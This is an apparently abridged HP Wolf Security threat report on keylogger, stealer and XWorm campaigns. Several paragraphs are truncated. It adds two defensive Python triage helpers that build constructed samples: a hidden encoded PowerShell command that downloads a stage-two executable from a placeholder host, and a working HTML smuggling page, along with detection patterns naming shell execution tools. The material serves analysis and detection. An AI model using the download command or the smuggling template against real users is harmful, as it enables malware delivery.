In Q3, the HP Threat Research team uncovered large malware campaigns spreading VIP Keylogger, caught by HP Sure Click. The threat actors behind this campaign sent emails posing as invoices and...
Much of the code in the script belongs to a legitimate XML parsing library. That legitimate code serves only to pad and obfuscate the malware; it never executes. The malicious portion decodes and runs a PowerShell script (T105...
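The practical lesson of this loader is that file size and the volume of benign code say nothing about what a script does; what matters is the handful of lines that reach an execution sink. The following triage helper, added here as an illustration and not code from the HP report, demonstrates that on a constructed sample: forty benign-looking XML helper functions wrap two lines that launch PowerShell. It lists the lines that touch an execution sink and recovers the plaintext of any `-EncodedCommand` argument (base64 of UTF-16LE text, the encoding PowerShell expects). The sample script, the placeholder second-stage URL and the assumption that the payload is passed via `-EncodedCommand` are all constructed for the example; the report does not say which PowerShell invocation the real campaign used.

```python
import base64
import re

# Constructed sample (not from the HP report): 40 benign-looking XML helper
# functions stand in for the bulk of a legitimate library; the only lines that
# matter are the two at the end, which launch an encoded PowerShell command.
BENIGN = "\n".join(
    "function getAttr%d(node) { return node.getAttribute('a%d'); }" % (i, i)
    for i in range(40)
)
# Hypothetical second-stage command; the URL is a placeholder, not a real IOC.
PAYLOAD_CMD = "Invoke-WebRequest -Uri http://example.invalid/stage2 -OutFile $env:TEMP\\s2.exe"
# PowerShell's -EncodedCommand takes the base64 of the UTF-16LE command text.
ENCODED = base64.b64encode(PAYLOAD_CMD.encode("utf-16le")).decode("ascii")
SAMPLE_SCRIPT = BENIGN + "\n" + (
    'var sh = new ActiveXObject("WScript.Shell");\n'
    'sh.Run("powershell.exe -NoP -W Hidden -EncodedCommand ' + ENCODED + '", 0, false);\n'
)

# Lines that can actually execute something, however much benign code surrounds them.
SINK = re.compile(
    r"WScript\.Shell|\.Run\s*\(|ShellExecute|powershell|cmd\.exe", re.IGNORECASE
)

# powershell ... -e / -ec / -en / -enc / -encodedcommand <base64>. PowerShell accepts
# any unambiguous prefix of the flag name; these are the forms seen most often.
ENC_FLAG = re.compile(
    r"""powershell(?:\.exe)?[^"';\n]*?\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})""",
    re.IGNORECASE,
)


def find_execution_sinks(script: str) -> list[tuple[int, str]]:
    """Return (line number, text) for every line that touches an execution sink."""
    return [
        (n, line.strip())
        for n, line in enumerate(script.splitlines(), 1)
        if SINK.search(line)
    ]


def decode_encoded_powershell(script: str) -> list[str]:
    """Recover the plaintext of every -EncodedCommand payload found in the script."""
    commands = []
    for match in ENC_FLAG.finditer(script):
        b64 = match.group(1)
        b64 += "=" * (-len(b64) % 4)  # restore padding that some loaders strip
        try:
            commands.append(base64.b64decode(b64, validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64/UTF-16LE; leave it for manual review
    return commands


if __name__ == "__main__":
    total = len(SAMPLE_SCRIPT.splitlines())
    sinks = find_execution_sinks(SAMPLE_SCRIPT)
    print(f"{total} lines, {len(sinks)} touch an execution sink:")
    for n, text in sinks:
        print(f"  line {n}: {text[:80]}")
    for cmd in decode_encoded_powershell(SAMPLE_SCRIPT):
        print("decoded PowerShell:", cmd)
```

On the constructed sample, 2 of 42 lines touch a sink, and the decoded command is the placeholder download-and-drop one-liner. Real loaders often split or concatenate the `powershell` string and the flag to defeat exactly this kind of regex, so treat a clean result as "nothing found by this pass", not as a verdict; the sink list is the place to start manual review either way.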
0bj3ctivityStealer campaign highlights how malware kits are boosting attack efficiency
Q3 saw another campaign, caught by HP Sure Click, that shared many similarities with the VIP Keylogger activity. Threat actors began by sending malicious archive files to targets by email, pos...
Though the two campaigns distribute different malware families, they share many similarities, including:
• Hiding malicious code within legitimate script...
HTML smuggling threat delivering XWorm bears hallmarks of GenAI
One of the techniques we see threat actors using to infect PCs is HTML smuggling (T1027.006).⁶ The aim is to deliver malicious content hidden within HTML files, tricking victims into infe...
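The defining property of HTML smuggling is that the malicious file never crosses the network as a file: the HTML carries it as an encoded string and browser-side JavaScript reassembles it (typically `atob` into a `Blob`, then a generated link with a `download` attribute that is clicked programmatically), so proxies and mail gateways only ever see HTML. The following analyzer, added here as an illustration and not code from the HP report, scores those client-side primitives in an HTML file and carves any long base64 literal to identify the embedded file type by its magic bytes. The smuggling page and the in-memory ZIP it carries are constructed for the example (the ZIP contains a harmless placeholder, not a real payload); the indicator list and the file-type signatures are the author's assumptions about what to look for, not anything the report specifies.

```python
import base64
import io
import re
import zipfile

# Constructed sample (not from the HP report): a small ZIP built in memory
# stands in for the smuggled archive; its contents are a harmless placeholder.
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _z:
    _z.writestr("invoice.js", "// placeholder, not a real payload\n")
SMUGGLED_PAYLOAD = _buf.getvalue()

SMUGGLING_HTML = """<html><body><p>Preparing your invoice, please wait...</p>
<script>
var data = "%s";
var bytes = Uint8Array.from(atob(data), function (c) { return c.charCodeAt(0); });
var blob = new Blob([bytes], { type: "application/octet-stream" });
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.zip";
document.body.appendChild(a);
a.click();
</script></body></html>""" % base64.b64encode(SMUGGLED_PAYLOAD).decode("ascii")

BENIGN_HTML = "<html><body><h1>Quarterly report</h1><p>Nothing unusual here.</p></body></html>"

# Client-side primitives that HTML smuggling chains together to assemble a
# file in the browser and hand it to the victim without a network download.
INDICATORS = {
    "atob": r"\batob\s*\(",
    "Blob": r"new\s+Blob\s*\(",
    "createObjectURL": r"createObjectURL\s*\(",
    "download-attr": r"\.download\s*=",
    "msSaveOrOpenBlob": r"msSaveOrOpenBlob",
    "auto-click": r"\.click\s*\(\s*\)",
}
# Quoted base64 literals long enough to carry a file.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")
# File signatures for the delivery types the report lists (plus PE and PDF).
MAGIC = [
    (b"PK\x03\x04", "ZIP"),
    (b"MZ", "PE"),
    (b"Rar!\x1a\x07", "RAR"),
    (b"7z\xbc\xaf\x27\x1c", "7Z"),
    (b"\x1f\x8b", "GZ"),
    (b"%PDF", "PDF"),
]


def sniff(data: bytes) -> str:
    """Identify a carved payload by its leading magic bytes."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"


def analyze_html(html: str) -> dict:
    """Score smuggling indicators and carve any embedded base64 payloads."""
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, html)]
    payloads = []
    for m in B64_LITERAL.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue  # long string, but not base64; ignore
        payloads.append((sniff(raw), len(raw)))
    return {"score": len(hits), "indicators": hits, "payloads": payloads}


if __name__ == "__main__":
    for label, doc in (("smuggling", SMUGGLING_HTML), ("benign", BENIGN_HTML)):
        print(label, analyze_html(doc))
```

The constructed smuggling page scores 5 of 6 indicators and yields one carved ZIP; the benign page scores 0 with nothing carved. As with any static signature, attackers split strings, rename identifiers and nest the decoder in further layers of obfuscation, so a low score is not a clean bill of health. That is exactly why the report leans on isolating the browser and opening the resulting file in a throwaway environment rather than on recognising the HTML in transit.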
In addition to the HTML smuggling campaign that leads to XWorm, in Q3 we observed another campaign that makes use of the same malware dropper. In this case, however, the infection started with...
The campaign not only combines multiple attack techniques to stay undetected during delivery and execution, but also points to a rise in AI-assisted malware development. Currently, we ar...
Threat actors target video game modification and cheat code repositories with Lumma Stealer
All the campaigns we’ve highlighted so far this quarter make use of email as their delivery method. The following campaign was an exception. In Q3, we spotted threat actors setting up a series...
In Q3, executables and scripts regained first place as the most common malware delivery type, accounting for 40% of threats caught by HP Sure Click, a rise of 5 percentage points over Q2. Archives were the second most common delivery type (34% of threats); the five archive formats threat actors abused most were ZIP, RAR, LZH, 7Z and GZ. PDF files accounted for 9% of threats, up 2 percentage points from Q2. Documents such as Microsoft Word formats (e.g. DOC, DOCX) made up 8% of threats, and malicious spreadsheets (e.g. XLS, XLSX) 7%. The remaining 2% of threats used other file types.
Email remained the top vector for delivering malware to endpoints (52% of threats), falling 9 percentage points compared to Q2. Malicious web browser downloads grew by 10 percentage points to 28% in Q3. Threats d...
The HP Wolf Security Threat Insights Report is made possible by the majority of our customers, who opt to share threat telemetry with HP. Our security experts analyze threat trends and significant malw...
Enterprises are most vulnerable from users opening email attachments, clicking on hyperlinks in emails, and downloading files from the web. HP Wolf Security protects the enterprise by isolatin...
HP Wolf Security is a new breedᶜ of endpoint security. HP’s portfolio of hardware-enforced security and endpoint-focused security services is designed to help organizations safeguard PCs,...
a. HP Wolf Enterprise Security is an optional service and may include offerings such as HP Sure Click Enterprise and HP Sure Access Enterprise. HP Sure Click Enterprise requires Windows 8 or 10; Microsoft Internet Explorer, Google Chrome, Chromium and Firefox are supported. Supported attachments include Microsoft Office (Word, Excel, PowerPoint) and PDF files, when Microsoft Office or Adobe Acrobat are installed. HP Sure Access Enterprise requires Windows 10 Pro or Enterprise. HP services are governed by the applicable HP terms and conditions of service provided or indicated to Customer at the time of purchase. Customer may have additional statutory rights according to applicable local laws, and such rights are not in any way affected by the HP terms and conditions of service or the HP Limited Warranty provided with your HP Product. For full system requirements, please visit www.hpdaas.com/requirements.
b. HP Wolf Security Controller requires HP Sure Click Enterprise or HP Sure Access Enterprise. HP Wolf Security Controller is a management and analytics platform that provides critical data around devices and applications and is not sold as a standalone service. HP Wolf Security Controller follows stringent GDPR privacy regulations and is ISO27001, ISO27017 and SOC2 Type 2 certified for Information Security. Internet access with connection to the HP Cloud is required. For full system requirements, please visit http://www.hpdaas.com/requirements.
c. HP Security is now HP Wolf Security. Security features vary by platform; please see the product data sheet for details. HP Services are governed by the applicable HP terms and conditions of service provided or indicated to Customer at the time of purchase. Customer may have additional statutory rights according to applicable local laws, and such rights are not in any way affected by the HP terms and conditions of service or the HP Limited Warranty provided with your HP Product.